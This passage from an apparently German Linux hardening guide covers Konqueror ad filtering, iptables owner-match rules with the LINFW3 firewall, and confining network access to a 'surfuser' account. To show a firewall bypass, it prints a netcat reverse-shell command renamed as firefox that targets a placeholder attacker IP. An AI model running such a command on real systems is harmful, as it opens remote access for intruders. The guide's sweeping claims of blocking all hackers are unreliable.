werden kann. Ansonsten arbeitet der Werbeblocker von Konqueror wie adblock-plus und noscript. Aus der Werkzeugleiste heraus kann er durch Mausklick auf entsprechendes Symbol fortlaufend eingesehen, ergänzt und bearbeitet werden. Falschangaben stehen ihm fern, wir, Gooken möchten daher eher zum bewährten Konqueror raten: Legen Sie sich eine Liste für den Werbeblocker zu, indem Sie sich Webseite für Webseite ansehen und seitens Filter von selbst aufgelistete Seitenbestandteile kurz über den Mausklick auf das Symbol für den Werbefilter in der Statusleiste und aus dem sich öffnendem Fenster Werbe- bzw. Trackingskripte auswählen, in beliebiger Form abspeichern und verwalten, mit der Zeit mehrere tausend! Zählen Perl- und Javascripte zur Sperrliste wie über den regulären Ausdruck "*.pl*" und "*.js*" stets der Fall, lassen sich in dem Fenster einzelne Javascripts nach und nach wieder nach dem Laden der Webseite freigeben, denn verboten ist ja, was nicht erlaubt ist. Sie können eine importierbare Filterliste für den Werbefilter des Konquerors mit derzeit über 10.000 in der Form regulärer Ausdrücke versehenen Einträgen der sogenannten Easylist und weiteren gesammelten Einträgen gegen eine einmalige Schutzgebühr von 10 € auch bei uns unter Downloads bestellen. Sie schneidet über reguläre Ausdrücke im Großen und Ganzen zur Zeit weder zu wenig noch zu viel Bestandteile von Webseiten heraus, bedarf aber auf beschriebene Art (von Webseite zu Webseite) sicherlich der manuellen Aktualisierung. Während nun die eine Portseite unter konsequenten Einsatz u.a. des STATE NEW über (mindestens) einen geschlossenen Linienblock gleich weitgehend zu Anfang der Chain INPUT vorab (H1) und zusätlich alternativ erst im Endteil der Chain INPUT von außen nach innen vollständig gegen alle Hacker schließt und auch einzelne geöffnete Ports (H3) derselben CHAIN auf NEW hin im Endteil zusätzlich noch einmal einen Block auf State NEW vornehmen (H4), öffnen sich Ports von außen nach innen unter den zugelassenen dort und nur dort, wo von Seiten des Surfers vorher explizit eine Verbindung aufgebaut worden ist und somit sowas wie eine ausdrückliche Erlaubnis besteht. Hier kann dann sowohl das Modul "String" von iptables (H2 und T2) als auch ein das Netz filternder Proxy (H3) wie auch Traffic Shaping (siehe Checkliste) aufsetzen. Um die Sicherheit online, hier Schutz vor Backdoors bzw. Trojanern, zu gewährleisten, genügt neben der i.a. in Anlehnung an der Konfiguration der Chain INPUT selbsttätig vollzogenen Konfiguration der OUTPUT-Ports über das Owner-Modul (T2) PID-, GID-, ferner UID- und - je nach Kernel auch CMD- Owner (Name des Kommandos bzw. Programm in etwaiger Ausführung oder auch Prozess) - die Konzentration auf nur einige wenige statt "unendlich viele "Programme in Ausführung (Prozesse) wie ausschließlich der zum Browser Firefox gehörende Prozess firefox bzw. firefox-bin für Firefox (empfohlen <= 2.0.0 und dem Prozessmanagement nach noch unter einem Zombie, d.h. einem auf das Beenden des Elternprozesses wartenden, aber bereits terminiertem und somit keinen Schaden anrichtendem Kindprozess laufenden 3.6.17 und Firefox >= 13 ) oder allein privoxy für Privoxy unter Benutzergruppe daemon (uid und gid 2) bzw. root bzw. kio_http und ggfls. noch kdeinit für Konqueror usw. für das Blocken von innen nach außen. Backdoors bzw. Trojaner bleiben also (ausgenommen Browser möglicher Weise selbst) in jedem Fall kein Thema: Kernelversion größer 2.6.13: Das Geheimnis alle Hacker und Trojaner auf einmal loszuwerden bzw. allesamt effektiv zu blocken, ist seitens Gooken nun endlich auch für einen größeren Kreis der UNIXer gelüftet! Der Block erfolgt nur noch auf einigen Kerneln nach 2.6.12 mittels P(rocess-)ID-Agent (T3) von Linfw3 über CMD- gleichkommendes PID-OWNER. Um die Firewall über Angaben bzw. Einstellungen aus der mit CMD-Owner gemeinsamen Liste "acceptedprograms" bei seitens LINFW3 selbsttätig erfolgender Suche zuzulassender PID nicht jedesmal neu starten zu müssen, verhilft in diesem Fall der zuverlässige PID-Agent von LINFW3 mit jedem Aufruf (Start wie insbesonders des Standard-Browsers) die vom Betriebssystem zugewiesene PID (hier zur Vereinfachung ausschließlich des Browsers) numerisch zu erfassen, alle auf dem Owner-Konzept basierenden Blöcke, um die ausdrücklich zugelassenen Prozesse herum aufzubauen. Kernel nach 2.6.13, die das Blocken mit SID-, PID-Owner und CMD-Owner nicht ermöglichen, verwenden außerdem noch weitere, im folgenden beschriebenen Techniken. Auch wenn der obige Ansatz mit CMD-Owner auf dem ersten Blick relativ sicher aussieht, so kann man den Abgleich des Kommandonamens nach http://blog.remoteshell-security.com/index.php?/archives/23- Der-Owner-Match-von-Iptables-Staerken-und-Schwaechen.html sehr einfach unterlaufen: maier@gentoo:~ cp /bin/nc ~/firefox maier@gentoo:~ ./firefox -e /bin/sh <ip-angreifer> 80 Diese einfache Kopie von netcat, ermöglicht es Herrn Maier, es für Iptables so aussehen zu lassen, als würde er wie in seiner Richtlinie festgelegt mit Firefox surfen, doch in Wirklichkeit öffnet er einen externen Angreifer einen Zugang ins interne Netz. Der Grund wieso hier der Owner-Match (genauer der CMD-Owner-Match) nicht greift liegt daran, das nur der Kommandonamen überprüft wird und dieser bleibt ja bestehen. Abhilfe schaffen hier nur genauer Restriktionen auf Dateisystemebene sowie das Verwenden der PID oder SID. CMD-Owner bzw. das sichere (!), aber auf SMP-(Mulitprozessor-)Linux-Kerneln abermals zerstörte Substitut SID-Owner findet in diesem Fall Umsetzung über UID und GID-Owner (T3). Auf UID- und GID-Owner lassen sich mit LINFW3 für alle Kernel wie folgt nur ganz bestimmte Prozesse wie firefox fürs Internet freigeben, während alle anderen von LINFW3 geblockt werden: Das Terminal (konsole, xterm, gnometerminal, usw) dient als sicherer Treffpunkt für über einen sog. Surf-Benutzer und eine sog. Surf-Gruppe passwortgeschützt online Verbindung aufnehmen sollende Prozesse wie Browser (Firefox, Konqueror, ...), Wörterbuch (kdict), Updates, System-Aktualisierungen (mdv: drakconf), Chat (xchat, ksirc, ...), TV-Browser (TV-Programme), Java usw. weiterer Vorteil: Um die einzelnen im Netz Verbindung aufbauen sollenden Programme müssen wir uns mit der Firewall-Konfiguration nicht mehr kümmern, wir müssen nichts mehr extra freigeben und extra blocken! Dadurch wird das jedesmal erforderliche mühsame Anpassen der Firewall wie Linfw3 verhindert, im Einzelnen: Erzeugung einer neuen Gruppe unter Hinzufügung erforderlicher Benutzer surfuser zu dieser Gruppe: * Erzeugen: groupadd surfgruppe * Validieren: grep surfgruppe /etc/group * Benutzer hinzufügen: useradd -g surfgruppe surfuser Setze "chmod 700 -R /home/surfuser." Soll hingegen ein bereits existierender Benutzer hinzugefügt werden, eignet sich folgender Befehl: usermod -g surfgruppe surfuser Jedesmal ist dann seitens eines von LINFW3 unter UID einzig zugelassenem (ANDEREM (!) ) Benutzer wie in unserem Beispiel (dem in der Benutzerverwaltung angelegten) "surfuser" passwortgeschützt zur in LINFW3 einzutragenden UID wie bspws. 501 nach erfolgtem
Diese Kommandos lassen sich auch im K-Menü eintragen, so dass man kein Terminal zum Aufruf von in diesem Fall Firefox mehr braucht: Eintrag im K-Menü kmenuedit (oder rechter Mausklick auf K-Menu und editieren) -> Registerkarte erweitert -> Benutzer: surfuser und unter Befehl: "sg surfgruppe firefox". Nun erscheint lediglich das passwort-Eingabefenster für surfuser, bevor firefox startet. Ansonsten ist auf dem Weg ins Netz nichts mehr zu tun. Genauso gehe man für alle anderen Netzanwendungen vor: Einwahl "ifup eth0", Abbau "ifdown eth0", Konqueror, kphone, gftp, tvbrowser, kdict (Port 2628), xchat, eboard, ... . Die Netz-Kommunikation für alle Benutzer und alle Prozesse bzw. Programme erfolgt nur über den passwortgeschützten Zugang über Treffpunkt Surfuser (und Surfgruppe) Um die Passworteingabe in einer laufenden Sitzung nicht andauernd wiederholen zu müssen, kreuze man das Feld "Passwort merken" im Passwort-Eingabefeld einfach mit der Maus an. Für obigen Aufruf "su - surfuser firefox" bedarf es also nur der einmaligen Passworteingabe pro Sitzung. 4. Der Prozess, der obigen Erklärung folgend firefox, startet nun mit Sicherheit. Die exklusiv (ausschließlich!) durch Benutzer Surfuser passwortgeschützt geöffnete, über Linfw3 (nur ihm) reservierte Verbindung gehört nun ausschließlich dem User surfuser und der Benutzergruppe surfgruppe, in der er, Surfuser, Mitglied ist, denn niemand denn er (Surfuser) hat sie aufgebaut. Nur Surfuser der Gruppe Surfgruppe darf im Netz kommunizieren, d.h. alle anderen Benutzer und selbst Superuser root nicht. Zugriffsrechte auf Ordner und Dateien (unter home) sollten entsprechend Lesen, Schreiben und Ausführen durch andere Benutzer und Gruppen verhindern. Das Terminal, falls noch nicht im K-Menü, kann man vorsichtshalber übrigens jetzt schon wieder schließen oder beenden (beenden Sie insbesonders im Root Modus Terminaleingaben immer mit der Eingabe von "exit" für Logout oder per Mausklick auf die Schaltfläche fürs Schließen in der oberen Fensterzeile des Terminals oder mit Klick auf Beenden aus dem Menü! Fortsetzung: hier klicken! |